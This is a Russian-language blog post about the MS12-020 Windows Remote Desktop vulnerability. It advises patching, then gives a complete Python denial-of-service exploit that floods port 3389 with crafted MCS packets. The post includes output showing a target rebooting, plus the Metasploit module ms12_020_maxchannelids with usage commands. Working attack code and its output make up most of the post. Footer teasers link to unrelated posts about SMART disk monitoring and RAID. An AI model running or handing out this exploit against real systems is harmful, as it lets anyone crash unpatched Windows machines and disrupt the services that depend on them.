Новая брешь в защите Windows.

Прошли слухи о появлении рабочего эксплойта.
Рабочий эксплойт?!
Рабочий эксплойт?!

Кому бояться? Всем у кого включено удаленное управление по RDP (исключение RDP с проверкой подлинности на уровне сети).
Что делать? Обновляться!!! Это можно сделать в ручную тут.
Для желающих проверить свою систему на прочность есть следующий код на Python:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

# ms12-020 smaller
# I reduced the needed payload to DOS, the crashed is caused by buf2
# bp RDPWD!NM_Disconnect // crash is after this
# 
# freenode #ms12-020
 
import socket
import sys
import time
 
#init
buf0 = "030000130ee000000000000100080000000000".decode('hex') 
#MCS: Connection-initial
buf1 = "030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0".decode('hex')
#payload
buf2 = "0300000802f08028".decode('hex')
 
package = buf0+buf1+buf2
 
HOST = sys.argv[1]
PORT = 3389
for i in range(10000):
 print i
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.settimeout(3)
 s.connect((HOST,PORT))
 try:
  s.send(package)
  rec = s.recv(1024)
 except:
  pass
 s.close()
Запускаем с бука и видим что наш домашний компьютер благополучно перезагрузился:
1
2
3
4
5
6
7
8
9

chelaxe@chellaptop:~$ python exploit/ms12-020.py 192.168.84.51
0
1
2
Traceback (most recent call last):
  File "exploit/ms12-020.py", line 26, in <module>
    s.connect((HOST,PORT))
  File "<string>", line 1, in connect
socket.timeout: timed out
Появление рабочего эксплойта весьма усугубит состояние безопасности многих предприятий, особенно использующих Windows XP и Windows Server 2003
Весьма подробная статья появилась на Habrahabr.
Metasploit FrameWork v4.3.0 появился код для отказа в обслуживании:
1
2
3
4
5
6
7
8
9
10
11
12

       Name: MS12-002 Microsoft Remote Desktop Use-After-Free DoS
     Module: auxiliary/dos/windows/rdp/ms12_020_maxchannelids
    Version: 0
    License: Metasploit Framework License (BSD)
       Rank: Normal
 
Description:
  This module exploits the MS12-002 RDP vulnerability originally 
  discovered and reported by Luigi Auriemma. The flaw can be found in 
  the way the T.125 ConnectMCSPDU packet is handled in the 
  maxChannelIDs field, which will result an invalid pointer being 
  used, therefore causing a denial-of-service condition.
Использовать так:
1
2
3
4
5
6
7
8
9
10

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 
msf  auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.0.1
RHOST => 192.168.0.1
msf  auxiliary(ms12_020_maxchannelids) > exploit 
 
[*] 192.168.0.1:3389 - Sending MS12-002 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.0.1:3389 - 210 bytes sent
[*] 192.168.0.1:3389 - Checking RDP status...
[*] 192.168.0.1:3389 is still up
[*] Auxiliary module execution

Комментарии

Отправить комментарий

Популярные сообщения из этого блога

S.M.A.R.T. (часть 3). Расшифровка и понимание SMART атрибутов

Изображение
Маленький рассказ об S.M.A.R.T. атрибутах, их важности и понимании. В статье пойдет речь об расшифровке всех smart атрибутов ATA дисков. В предыдущих статьях речь шла об  мониторинге BBU  и  жестких SCSI дисков и их атрибутов под Megaraid контроллером . Теперь хочу немного описать атрибуты обычных АТА дисков на примере Seagate Barracuda ES.2 (ST31000340NS). Так же определим самые важные атрибуты, на которые нужно обращать внимание при мониторинге дисков используя smartctl. Для начала, можно убедиться, что наш диск поддерживает смарт 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 root@ s01:~ # smartctl -i /dev/sda smartctl 5.41 2011-06-09 r3365 [x86_64-linux-3.8.0-29-generic] ( local build) Copyright (C) 2002-11 by Bruce Allen, http: //smartmontools .sourceforge.net === START OF INFORMATION SECTION === Model Family:     Seagate Barracuda ES.2 Device Model:     ST31000340NS Serial Number:...
Далее...

S.M.A.R.T. (часть 2). Мониторинг BBU RAID контроллеров

Изображение
В  предыдущей статье  шла речь об установки megacli для мониторинга дисков под LSI 2108 Megaraid контроллеров. Сейчас же я хочу немного описать мониторинг батареи (BBU) для RAID контроллеров в целом. Какие шаги нужно предпринимать и как не наделать лишних проблем для себя при возникновении ошибок или неполадок с BBU (Battery Backup Unit). Состояние батареи нужно периодически проверять. Для RAID контроллеров этот компонент вообще может отсутствовать, так как его основное предназначение – это держать в кэше данные, которые еще не записались на диск, т.е. сохранение целостности данных при сбое питания (внезапное отключения подачи электричества). На данный момент, почти все рейд контроллеры поддерживают кэширование данных на уровне контроллера. Т.е. каждый физический диск имеет свой кэш плюс кэш контроллера. Такой подход повышает производительность системы при сохранение большого количества данных или же при очень высоком уровне отдачи контента конечным пользователям. Ес...
Далее...

Работаем с RAID в Debian на HP Proliant DL580

Изображение
В этой заметке пойдёт речь о работе с RAID контроллером сервера HP Proliant DL580 G7 в операционной системе Debian GNU/Linux 7. Подготовка Чтобы научить Debian обращаться к RAID-контроллеру будет необходимо доставить кое-какой проприетарный софт. Т.к. у меня нет возможности подцепить репозитарий HP в Интернете, то необходимые пакеты просто закачаем: wget -r -l 1 -nd -k -np -A "*amd64.deb" http://downloads.linux.hp.com/SDR/repo/mcp/Debian/pool/non-free/ wget -r -l 1 -nd -k -np -A "*all.deb" http://downloads.linux.hp.com/SDR/repo/mcp/Debian/pool/non-free/ Описание софта: cpqacuxe_9.40.2-2._amd64.deb HP Array Configuration Utility, cpqacuxe — утилита управления RAID-контроллером через web-интерфейс. Является расширением для hpsmh (об этом ниже). hpacucli_9.40.1-1._amd64.deb HP Command Line Array Configuration Utility, hpacucli – консольная утилита управления RAID-контроллером. Её мы поставим в первую очередь. hp-ams_1.4.2-1114.2_amd64.deb Age...
Далее...